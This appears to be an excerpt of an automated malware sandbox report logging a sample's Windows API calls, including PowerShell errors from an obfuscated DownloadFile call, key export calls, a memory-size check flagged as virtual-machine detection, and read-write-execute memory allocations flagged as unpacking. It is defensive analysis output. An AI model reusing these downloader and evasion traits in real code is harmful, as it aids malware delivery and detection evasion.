WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: ]::Tls12 console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x00000077	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x00000083	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x00000023	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: At line:1 char:23 console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + $Hallmark.DownloadFile <<<< ($Tipstaves,$Youthening) console_handle: 0x00000047	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x00000053	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x0000007f	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000008b	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: At line:1 char:23 console_handle: 0x00000097	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + $Hallmark.DownloadFile <<<< ($Tipstaves,$Youthening) console_handle: 0x000000a3	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000af	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000bb	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x000000db	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x000000e7	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: At line:1 char:23 console_handle: 0x000000f3	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + $Hallmark.DownloadFile <<<< ($Tipstaves,$Youthening) console_handle: 0x000000ff	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000010b	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000117	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x00000137	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x00000143	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: At line:1 char:23 console_handle: 0x0000014f	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + $Hallmark.DownloadFile <<<< ($Tipstaves,$Youthening) console_handle: 0x0000015b	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x00000167	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000173	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x00000023	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: At line:1 char:23 console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + $Hallmark.DownloadFile <<<< ($Tipstaves,$Youthening) console_handle: 0x00000047	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x00000053	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x0000007f	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000008b	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: At line:1 char:23 console_handle: 0x00000097	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + $Hallmark.DownloadFile <<<< ($Tipstaves,$Youthening) console_handle: 0x000000a3	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000af	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000bb	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x00000023	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: At line:1 char:23 console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + $Hallmark.DownloadFile <<<< ($Tipstaves,$Youthening) console_handle: 0x00000047	1	1
WriteConsoleW Aug. 30, 2024, 6:07 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x00000053	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370f00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370f00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370f00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370f00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370f00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370f00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003706c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370780 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370780 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370780 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370780 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370780 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370780 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370780 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 30, 2024, 6:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00370780 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 30, 2024, 6:07 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 162 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02630000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02660000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72681000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72682000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02661000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02633000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02634000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02636000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02653000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02654000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02655000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02656000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02657000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02658000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02659000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bfa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bfb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bfc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bfd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bfe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bff000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
